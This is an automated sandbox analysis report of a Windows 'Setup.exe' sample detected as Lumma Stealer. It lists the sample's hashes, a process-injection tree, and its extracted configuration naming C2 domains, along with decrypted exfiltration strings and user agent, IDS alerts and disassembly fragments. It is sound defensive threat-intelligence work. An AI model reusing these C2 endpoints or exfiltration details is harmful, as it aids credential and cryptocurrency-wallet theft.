Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:Setup.exe
Analysis ID:1532481
MD5:f1113fd6005b558b0a9624edd97dbd58
SHA1:6a0b156e56f99d81e4567d5b4e0d296957f38746
SHA256:faaf64f9c081fdcf8715679549607bba7f70b594459167cf9f5a9b73664d89ba
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found evasive API chain checking for user administrative privileges
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Setup.exe (PID: 6752 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: F1113FD6005B558B0A9624EDD97DBD58)
    • BitLockerToGo.exe (PID: 4564 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
      • WerFault.exe (PID: 6048 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 1648 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["drawwyobstacw.sbs", "resinedyw.sbs", "condifendteu.sbs", "mathcucom.sbs", "allocatinow.sbs", "enlargkiw.sbs", "ehticsprocw.sbs", "vennurviot.sbs", "proclaimykn.buzz"], "Build id": "tLYMe5--222"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1919656324.0000000003CD6000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
  • 0x0:$x1: 4d5a9000030000000
00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
    00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      00000000.00000002.1919656324.0000000003D6B000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        00000000.00000002.1919656324.0000000003DC2000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          Click to see the 1 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.Setup.exe.3e18000.2.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            1.2.BitLockerToGo.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              0.2.Setup.exe.3dc2000.3.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                0.2.Setup.exe.3dc2000.3.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                  1.2.BitLockerToGo.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                    Click to see the 1 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T12:00:28.046409+020020546531A Network Trojan was detected192.168.2.449736188.114.97.3443TCP
                    2024-10-13T12:00:29.015426+020020546531A Network Trojan was detected192.168.2.449737188.114.96.3443TCP
                    2024-10-13T12:00:30.024392+020020546531A Network Trojan was detected192.168.2.449738104.21.33.249443TCP
                    2024-10-13T12:00:30.979674+020020546531A Network Trojan was detected192.168.2.449739104.21.77.78443TCP
                    2024-10-13T12:00:31.974411+020020546531A Network Trojan was detected192.168.2.449740172.67.140.193443TCP
                    2024-10-13T12:00:32.962498+020020546531A Network Trojan was detected192.168.2.449741172.67.173.224443TCP
                    2024-10-13T12:00:33.944460+020020546531A Network Trojan was detected192.168.2.449742104.21.79.35443TCP
                    2024-10-13T12:00:36.251128+020020546531A Network Trojan was detected192.168.2.449745172.67.206.204443TCP
                    2024-10-13T12:00:37.287454+020020546531A Network Trojan was detected192.168.2.449746172.67.206.204443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T12:00:28.046409+020020498361A Network Trojan was detected192.168.2.449736188.114.97.3443TCP
                    2024-10-13T12:00:29.015426+020020498361A Network Trojan was detected192.168.2.449737188.114.96.3443TCP
                    2024-10-13T12:00:30.024392+020020498361A Network Trojan was detected192.168.2.449738104.21.33.249443TCP
                    2024-10-13T12:00:30.979674+020020498361A Network Trojan was detected192.168.2.449739104.21.77.78443TCP
                    2024-10-13T12:00:31.974411+020020498361A Network Trojan was detected192.168.2.449740172.67.140.193443TCP
                    2024-10-13T12:00:32.962498+020020498361A Network Trojan was detected192.168.2.449741172.67.173.224443TCP
                    2024-10-13T12:00:33.944460+020020498361A Network Trojan was detected192.168.2.449742104.21.79.35443TCP
                    2024-10-13T12:00:36.251128+020020498361A Network Trojan was detected192.168.2.449745172.67.206.204443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T12:00:37.287454+020020498121A Network Trojan was detected192.168.2.449746172.67.206.204443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T12:00:33.483066+020020565591Domain Observed Used for C2 Detected192.168.2.449742104.21.79.35443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T12:00:34.145782+020020565571Domain Observed Used for C2 Detected192.168.2.449743188.114.97.3443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T12:00:32.501560+020020565611Domain Observed Used for C2 Detected192.168.2.449741172.67.173.224443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T12:00:29.570044+020020565671Domain Observed Used for C2 Detected192.168.2.449738104.21.33.249443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T12:00:28.579610+020020565711Domain Observed Used for C2 Detected192.168.2.449737188.114.96.3443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T12:00:30.581850+020020565651Domain Observed Used for C2 Detected192.168.2.449739104.21.77.78443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T12:00:31.511896+020020565631Domain Observed Used for C2 Detected192.168.2.449740172.67.140.193443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T12:00:29.017335+020020565681Domain Observed Used for C2 Detected192.168.2.4580641.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T12:00:32.981280+020020565581Domain Observed Used for C2 Detected192.168.2.4579561.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T12:00:33.952216+020020565561Domain Observed Used for C2 Detected192.168.2.4511891.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T12:00:31.976753+020020565601Domain Observed Used for C2 Detected192.168.2.4497091.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T12:00:29.044146+020020565661Domain Observed Used for C2 Detected192.168.2.4581641.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T12:00:28.058427+020020565701Domain Observed Used for C2 Detected192.168.2.4552151.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T12:00:30.077573+020020565641Domain Observed Used for C2 Detected192.168.2.4495011.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T12:00:30.993990+020020565621Domain Observed Used for C2 Detected192.168.2.4588451.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T12:00:35.413053+020028586661Domain Observed Used for C2 Detected192.168.2.449744104.102.49.254443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
                    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
                    Found malware configuration
                    Source: 0.2.Setup.exe.3dc2000.3.unpackMalware Configuration Extractor: LummaC {"C2 url": ["drawwyobstacw.sbs", "resinedyw.sbs", "condifendteu.sbs", "mathcucom.sbs", "allocatinow.sbs", "enlargkiw.sbs", "ehticsprocw.sbs", "vennurviot.sbs", "proclaimykn.buzz"], "Build id": "tLYMe5--222"}
                    Multi AV Scanner detection for domain / URL
                    Source: vennurviot.sbsVirustotal: Detection: 16%Perma Link
                    Source: sergei-esenin.comVirustotal: Detection: 17%Perma Link
                    Source: mathcucom.sbsVirustotal: Detection: 19%Perma Link
                    Source: mathcucom.sbsVirustotal: Detection: 19%Perma Link
                    Source: https://vennurviot.sbs/apiVirustotal: Detection: 17%Perma Link
                    Source: https://sergei-esenin.com/rVirustotal: Detection: 16%Perma Link
                    Source: https://sergei-esenin.com:443/apiVirustotal: Detection: 18%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: Setup.exeVirustotal: Detection: 19%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Sample uses string decryption to hide its real strings
                    Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmpString decryptor: drawwyobstacw.sbs
                    Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmpString decryptor: condifendteu.sbs
                    Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmpString decryptor: ehticsprocw.sbs
                    Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmpString decryptor: vennurviot.sbs
                    Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmpString decryptor: resinedyw.sbs
                    Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmpString decryptor: enlargkiw.sbs
                    Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmpString decryptor: allocatinow.sbs
                    Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmpString decryptor: mathcucom.sbs
                    Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmpString decryptor: proclaimykn.buzz
                    Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                    Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                    Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                    Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                    Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                    Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmpString decryptor: tLYMe5--222
                    Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.33.249:443 -> 192.168.2.4:49738 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.77.78:443 -> 192.168.2.4:49739 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.4:49740 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.173.224:443 -> 192.168.2.4:49741 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.79.35:443 -> 192.168.2.4:49742 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49744 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.4:49745 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.4:49746 version: TLS 1.2
                    Source: Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: Binary string: BitLockerToGo.pdb source: Setup.exe, 00000000.00000002.1918803772.00000000038B6000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: BitLockerToGo.pdbGCTL source: Setup.exe, 00000000.00000002.1918803772.00000000038B6000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h1_2_0043C27A
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 27BAF212h1_2_00442B8A
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [eax], bl1_2_00410CE0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx1_2_00410CE0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi-000000ACh]1_2_00442F74
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [ebp+00h], ax1_2_0040FF1D
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax1_2_00426040
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, eax1_2_00423050
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]1_2_00401000
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea eax, dword ptr [esi+04h]1_2_0042C000
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], F3285E74h1_2_00441010
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 731CDBF3h1_2_00441010
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]1_2_0042B030
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 62429966h1_2_004400E0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, dword ptr [ebp-10h]1_2_0042E108
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ecx+ebx*8], 53F09CFAh1_2_004201B0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ecx+ebx*8], 07E776F1h1_2_004201B0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ecx+ebx*8], 07E776F1h1_2_004201B0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-1Bh]1_2_004402C0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 7B3AFDABh1_2_004402C0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, byte ptr [esi+edx+77EAD70Ah]1_2_00430300
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], cl1_2_00430300
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-40592EB2h]1_2_00430300
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+00000414h]1_2_00430300
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], cl1_2_00430300
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebp, word ptr [eax]1_2_00446310
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h1_2_00427560
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]1_2_0043E530
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 64567875h1_2_00440530
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [edi+ebx]1_2_004055D0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-11h]1_2_0042D676
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h1_2_0042D676
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h1_2_0042D676
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-6Ah]1_2_00446600
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]1_2_004396E0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax-416E7C15h]1_2_004256A6
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], dx1_2_004256A6
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esi], ecx1_2_004116B1
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx1_2_0041E760
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h1_2_0041E760
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]1_2_0042F840
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, dword ptr [esp+04h]1_2_00420870
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h1_2_0043C800
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-000000E1h]1_2_004288F0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+18h]1_2_0042C966
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [edx+ebx]1_2_004439A0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h1_2_0042BA60
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea esi, dword ptr [edx+ecx]1_2_0042BA60
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebp-00010794h]1_2_00444A30
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push eax1_2_0042DAC2
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h1_2_0043CAD0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [esi+ebp], 00000000h1_2_0042FB40
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, edx1_2_0043FB50
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0001078Ah]1_2_00444B60
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebp-00010794h]1_2_00444B60
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, word ptr [edi+eax*4]1_2_0040BB20
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [0044DFA8h]1_2_0042EB30
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-11h]1_2_0042EB30
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-4Fh]1_2_00421BC0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx1_2_00421BC0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [esi], ax1_2_00421BC0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 27BAF212h1_2_00442C56
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebp-00010794h]1_2_00444A30
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 03BA5404h1_2_0043FD10
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi-1Bh]1_2_0043BD30
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi-30034F32h]1_2_0040EDF0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea eax, dword ptr [esp+10h]1_2_00442E5F
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h1_2_0043FE30
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edi*8], DEF797A3h1_2_0043FEC0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+ebx*8], 07E776F1h1_2_0043FEC0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+54EFD247h]1_2_0042BE90
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, ecx1_2_00441E9B
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp], 00000000h1_2_0041DEB0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [ebp+ecx-18h]1_2_00444EB0

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2056556 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs) : 192.168.2.4:51189 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2056570 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs) : 192.168.2.4:55215 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2056568 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs) : 192.168.2.4:58064 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2056558 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs) : 192.168.2.4:57956 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2056560 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs) : 192.168.2.4:49709 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2056562 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs) : 192.168.2.4:58845 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2056557 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI) : 192.168.2.4:49743 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2056567 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI) : 192.168.2.4:49738 -> 104.21.33.249:443
                    Source: Network trafficSuricata IDS: 2056559 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI) : 192.168.2.4:49742 -> 104.21.79.35:443
                    Source: Network trafficSuricata IDS: 2056564 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs) : 192.168.2.4:49501 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2056563 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI) : 192.168.2.4:49740 -> 172.67.140.193:443
                    Source: Network trafficSuricata IDS: 2056565 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI) : 192.168.2.4:49739 -> 104.21.77.78:443
                    Source: Network trafficSuricata IDS: 2056566 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs) : 192.168.2.4:58164 -> 1.1.1.1:53
